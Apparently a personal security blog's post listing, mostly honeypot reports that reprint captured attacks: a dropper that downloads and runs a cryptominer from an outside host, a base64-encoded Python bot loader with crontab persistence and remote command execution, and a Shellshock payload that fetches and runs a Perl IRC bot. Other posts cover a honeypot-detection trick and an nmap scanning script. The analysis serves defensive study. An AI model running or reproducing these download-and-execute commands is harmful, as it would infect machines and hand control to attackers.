sumokoin – cryptonight

February 27th, 2018

Another honeypot-entry catched my eye. First, the attack
itself was unusual because the malware download was executed
by a small python script instead of just running wget or curl:

uname -a
rm -f /tmp/run
if [ ` getconf LONG_BIT ` -eq 64 ]
then u=”http://www.bizqsoft.com/tp2/r6.log”
else u=”http://www.bizqsoft.com/tp2/r.log”
fi
wget -O /tmp/run
curl -o /tmp/run
python -c “import urllib;urllib.urlretrieve(‘$u’,’/tmp/run’)”

Looking into the downloaded binary one finds this miner for
the cryptocoin “sumokoin” using the “cryptonight” algorithm:

{“algo”:”cryptonight”,”av”:0,”background”:false,”colors”:true,”cpu-affinity”:nul
l,”cpu-priority”:null,”donate-level”:5,”log-file”:null,”max-cpu-usage”:75,”print
-time”:60,”retries”:5,”retry-pause”:5,”safe”:false,”syslog”:false,”threads”:null
,”pools”:[{“url”:”pool.sumokoin.hashvault.pro:80″,”user”:”Sumoo6Au3wBiUakx2yC748
Zecr8qKa1J1eMpMCgBQCup9wPecdW7KZiTVvKXGMqvxEDJrYr8pUpDkhG5MHUjf7XX64WoxR4kxon”,”
pass”:”x86_64″,”keepalive”:true,”nicehash”:false},{“url”:”pool.sumokoin.com:3333
“,”user”:”Sumoo6Au3wBiUakx2yC748Zecr8qKa1J1eMpMCgBQCup9wPecdW7KZiTVvKXGMqvxEDJrY
r8pUpDkhG5MHUjf7XX64WoxR4kxon”,”pass”:”x86_64″,”keepalive”:true,”nicehash”:false
},],”api”:{“port”:0,”access-token”:null,”worker-id”:null}}

(see https://coinmarketcap.com/currencies/sumokoin/ )

Looking into the blockchainexplorer I currently find no transactions linked
to that address, but that may be because of the nature of sumokoin ..

Tags: , ,
Posted in Bots, Honeypots | No Comments »

Linux Botnet

January 10th, 2018

another nice ssh honeypot-catch:

uname nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CndoaWxlIFRydWU6CiAgICB0cnk6CiAgIC
AgICAgcGFnZT1iYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi51cmxvcGVuKCJodHRwOi8vay56c3c4LmNjL0FwaS8iKS5yZWFkKCkpCiAgICAgICAgZXhlYyhwYW
dlKQogICAgZXhjZXB0OgogICAgICAgIHBhc3MKICAgIHRpbWUuc2xlZXAoMzAwKQ=='))" > /dev/null 2 >& 1 &

That downloads a base64-encoded complete python-program from  http://k.zsw8.cc/Api/

In that program a crontab-entry is made

   if runCodePath not in crontabData:
                f = open("/etc/crontab", "a+")
                f.write("\n0 */6 * * * root %s\n" % runCodePath)

then it loads data about the hacked server to the herder:

   my_data = {"key":d.get_key, "name":d.get_name, "os":d.get_platform, "core":d.get_core, "cpu":d.get_cpucount, "cpuuse":d.get_cpuuse, "status":d.get_status}
            f = urllib.urlopen(apiURL, urllib.urlencode(my_data))

and waits for commands:

 

  if data.has_key("download") and data["download"]:
                    DownExec(data["download"], task_id)
       if data.has_key("cmd") and data["cmd"]:
                    CmdExec(data["cmd"], task_id)

Wonder what would happen if the computer name would be a beef-xss hook or something..?

Posted in Bots, exploits, Honeypots | No Comments »

Chinese hackers

May 4th, 2017

Recently on a firewall log: 1 million deny entries PER DAY from china ..

Every day .. ~ 1 million deny entries with source in China.

Can’t we just ban them from the internet?

 

Posted in Allgemein | No Comments »

Honeypot detection

April 26th, 2017

My honeypots are sending out complaints on every single successful login.

Recently I saw the following logged entry in the complaint:

echo -en “\\x31\\x33\\x33\\x37”
cat /bin/ls

Now neither kippo nor cowrie as sshd-honeypots have the file “/bin/ls” which could be looked at,  so a  ‘cat /bin/ls’ just result in a :

‘cat: /bin/ls: No such file or directory’

So this seems to be an easy and reliable way to test for a standard sshd-honeypot..
No wonder that \\x31\\x33\\x33\\x37 just translates to “1337”, which I interpret as a smiley left by the hacker ..

Tags: , , , , , ,
Posted in Honeypots | No Comments »

RSA broken?

February 25th, 2016

Via twitter i was directed to

https://www.linkedin.com/pulse/rsa-beginning-end-william-buchanan

(Thanks @Andrea for retweeting)

and saw a really fascinating approach to break RSA by pre-calculated prime factors.

Here is an online RSA-cracker:

http://asecuritysite.com/encryption/crackrsa?n=89%2C070%2C570%2C720%2C149%2C060%2C561%2C995%2C361%2C437%2C269%2C869%2C694%2C609%2C685%2C454%2C824%2C674%2C559

 

(cracking N=8907057072014906056199536143726986969460968545482 )

Wondering what will come next..

 

Posted in Allgemein | 1 Comment »

remote website screenshots

January 12th, 2016

Recently I wanted to check, if and what kind of webpages are available in a specific ip-address range. So I decided to scan the ips and make screenshots of the found services. Not as professional as archive.org or similar .. just a short look to get an idea. Problem was, that there was no tool which I just could fire up. So I started frickling some scripts ..

Step 1: scan the ip-range. I used nmap (what else) and logged the results in a file.

 nmap --open -p80,443 --host-timeout 3 --max-retries 2 172.16.0.0/16 > ll

That went quite fast.. Took only a few minutes. After that I started a small script for cleaning the result:

#!/bin/bash
grep -i "skipping" *ll > sl
awk '{ print $4}' < sl | sed s/\(// | sed s/\)// > sl2
grep "report for" *ll > l
awk '{ print $NF}' < l | sed s/\(// | sed s/\)// > l2
for i in ` cat sl2`
do
 grep -v $i l2 > xx
 mv xx l2
done
 
./l.sh
./i.sh

Okay .. here is the l.sh and i.sh:
l.sh: (start TOR first .. don’t want to annoy someone..)

for i in `cat l2`
do
torsocks wget –convert-links -B http://$i –no-check-certificate -t 1 -T 2 -O $i.html $i ; xvfb-run — wkhtmltopdf $i.html $i.pdf
torsocks wget –convert-links -B https://$i –no-check-certificate -t 1 -T 2 -O $i-443.html https://$i ; xvfb-run — wkhtmltopdf $i-443.html $i-443.pdf
done

Needed some tries with wget until I had an acceptable result. Played around with “-p” and “-r -l 1” and “-E” and  “-K” .. that one with just the -B worked best for me. So had the html-files.. but I wanted to have a quick look at them and did not want to start browsing local files. Therefore I transformed the html-files to pdf, and then (in the next step) I used convert to get png – files. (Did not find any html-to-png tools)

i.sh :

for i in `ls *pdf`
do
  convert $i `basename -s .pdf $i`.png 
done

(After that: copy the png-files to a place of your choice.., generate thumbnails..scroll around…)

There are some commcial vendors for services like this with much better quality (including zoomable thumbnails, galeries..you name it) but I wanted to have a quick’n dirty solution for free..

Though I am pretty sure that there are much better tools and hundred better solutions this worked for me.

Posted in Allgemein | No Comments »

~7000 ssh logins

January 5th, 2016

recently I looked in some honeypot results – ending in finding of the URL

http://185.62.190.222/r1

(Warning: without the /r1 you are forced into a fake Adobe update).

Looking around further I found (besides some scanner-tools, code..) two files stage1 and stage2 under the subdir /r4 ,  containing about 7000 username:password:ip-address combinations. And yes, I found some of my honeypot addresses in there 🙂 Though I am pretty sure that most of the addresses will be honeypots I will try to send out mails to the appropriate abuse-contacts; maybe some of them are for real.

Posted in Honeypots | No Comments »

recently in the webserver log ..

August 17th, 2015

While strolling through the webserver-logs, I found this little asshole..:

78.25.80.226 - - [16/Aug/2015:21:35:01 +0200] "GET /suspendedpage.cgi
HTTP/1.1" 404 494 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget
http://189.11.9.243/fix.pl;curl -O http://189.11.9.243/fix.pl;fetch
http://189.11.9.243/fix.pl;lwp-download http://189.11.9.243/fix.pl;perl
fix.pl;rm -rf fix.pl;rm -rf fix.pl*\""

fix.pl installs an irc-connection and waits for commands like
portscan, tcpflood or a reverse shell ..

Looks like there are still servers out there which are vulnerable to shellshock ..

Posted in Bots, exploits | No Comments »

So you want to be a darknet drug lord ..

April 16th, 2015

..is the title of an article a user named “th3j35t3r” published on pastebin.

Here is the Link to the interesting article

Posted in Allgemein | No Comments »

Starwars in the office

January 5th, 2015

Now here is a funny movie what happens in an office when nerds get attacked..

https://t.co/JIBMlNs4ei

Posted in Allgemein | No Comments »

« Older Entries